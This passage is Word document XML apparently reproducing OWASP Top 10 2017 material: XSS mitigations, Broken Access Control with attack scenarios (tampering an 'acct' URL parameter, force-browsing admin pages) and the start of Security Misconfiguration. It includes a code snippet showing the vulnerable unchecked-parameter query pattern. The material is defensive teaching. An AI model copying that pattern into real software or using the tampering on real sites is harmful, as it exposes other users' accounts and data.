          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>For rich content, consider auto-sanitization libraries like OWASP’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.owasp.org/index.php/AntiSamy" \o "AntiSamy" </w:instrText>
      </w:r>
      <w:r w:rsidR="001A18C2">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AntiSamy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A18C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0B0080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> or the </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tooltip="OWASP Java HTML Sanitizer Project" w:history="1">
        <w:r w:rsidRPr="00801517">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Java HTML Sanitizer Project</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Consider </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00801517">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>Content Security Policy (CSP)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to defend against XSS across your entire site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRPr="002F1F2E" w:rsidRDefault="002F1F2E" w:rsidP="002F1F2E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="004D49A4" w:rsidP="00801517">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:tooltip="Top 10 2017-A4-Broken Access Control" w:history="1">
        <w:r w:rsidR="00801517" w:rsidRPr="00801517">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>A4-Broken Access Control</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Restrictions on what authenticated users are allowed to do are not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Example Attack Scenarios</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b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> The application uses unverified data in a SQL call that is accessing account information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pstmt.setString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>("acct"));</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ResultSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> results = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pstmt.executeQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>( );</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An attacker simply modifies the ‘acct’ parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user’s account.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://example.com/app/accountInfo?acct=</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>notmyacct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>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b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> An attacker simply force browses to target URLs. Admin rights are also required for access to the admin page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://example.com/app/getappInfo</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>http://example.com/app/</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>admin_getappInfo</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If an unauthenticated user can access either page, it’s a flaw. If a non-admin can access the admin page, this is also a flaw.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How Do I Prevent 'Broken Access Control'?</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Preventing access control flaws requires selecting an approach for protecting each function and each type of data (e.g., object number, filename).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Check access</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Each use of a direct reference from an untrusted source must include an access control check to ensure the user is authorized for the requested resource.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Use per user or session indirect object references</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. This coding pattern prevents attackers from directly targeting unauthorized resources. For example, instead of using the resource’s database key, a drop down list of six resources authorized for the current user could use the numbers 1 to 6 to indicate which value the user selected. OWASP’s </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tooltip="ESAPI" w:history="1">
        <w:r w:rsidRPr="00801517">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>ESAPI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> includes both sequential and random access reference maps that developers can use to eliminate direct object references.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00801517" w:rsidRPr="00801517" w:rsidRDefault="00801517" w:rsidP="00801517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Automated verification</w:t>
      </w:r>
      <w:r w:rsidRPr="00801517">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Leverage automation to verify proper authorization deployment. This is often custom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E"/>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="004D49A4" w:rsidP="006F28A6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:tooltip="Top 10 2017-A5-Security Misconfiguration" w:history="1">
        <w:r w:rsidR="006F28A6" w:rsidRPr="006F28A6">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0B0080"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>A5-Security Misconfiguration</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F1FF"/>
        <w:spacing w:after="24" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, platform, etc. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F1F2E" w:rsidRDefault="002F1F2E"/>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:spacing w:after="45" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4A1647"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Example Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #1:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #2:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> Directory listing is not disabled on your web server. An attacker discovers they can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which they decompile and reverse engineer to get all your custom code. Attacker then finds a serious access control flaw in your application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #3:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F28A6" w:rsidRPr="006F28A6" w:rsidRDefault="006F28A6" w:rsidP="006F28A6">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Scenario #4:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F28A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
